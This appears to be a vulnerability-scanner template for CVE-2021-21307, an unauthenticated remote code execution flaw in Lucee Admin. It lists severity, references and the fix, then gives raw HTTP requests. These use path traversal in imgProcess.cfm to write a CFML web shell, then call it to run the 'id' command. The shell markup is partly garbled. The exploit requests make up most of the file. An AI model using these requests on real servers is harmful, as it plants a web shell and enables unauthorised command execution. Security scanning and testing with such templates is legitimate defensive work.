id: CVE-2021-21307 info: name: Lucee Admin - Remote Code Execution author: dhiyaneshDk severity: critical description: Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 contains an unauthenticated remote code execution vulnerability. remediation: This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, block access to the Lucee Administrator. reference: - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md - https://nvd.nist.gov/vuln/detail/CVE-2021-21307 - http://ciacfug.org/blog/updating-lucee-as-part-of-a-vulnerability-alert-response - https://dev.lucee.org/t/lucee-vulnerability-alert-november-2020/7643 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-21307 cwe-id: CWE-862 epss-score: 0.97384 epss-percentile: 0.99885 cpe: cpe:2.3:a:lucee:lucee_server:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: lucee product: lucee_server tags: cve,cve2021,rce,lucee,adobe http: - raw: - | POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded imgSrc=a - | POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded imgSrc=
Command:value="#form.cmd#">
Options: value="#form.opts#">
Timeout: value="#form.timeout#" value="5">
      #HTMLCodeFormat(myVar)# 
- | POST /lucee/{{randstr}}.cfm HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded cmd=id&opts=&timeout=5 matchers-condition: and matchers: - type: word part: body words: - "uid=" - "gid=" - "groups=" condition: and - type: status status: - 200 extractors: - type: regex regex: - "(u|g)id=.*" # digest: 4a0a00473045022021701732f422d1094423cb747345447624e10792af27c307e04336180170f64a0221008b21d9a71faef391ee78949df173821b3536ff08e29d2b5d424e9c8bdf57e6bb:922c64590222798bb761d5b6d8e72950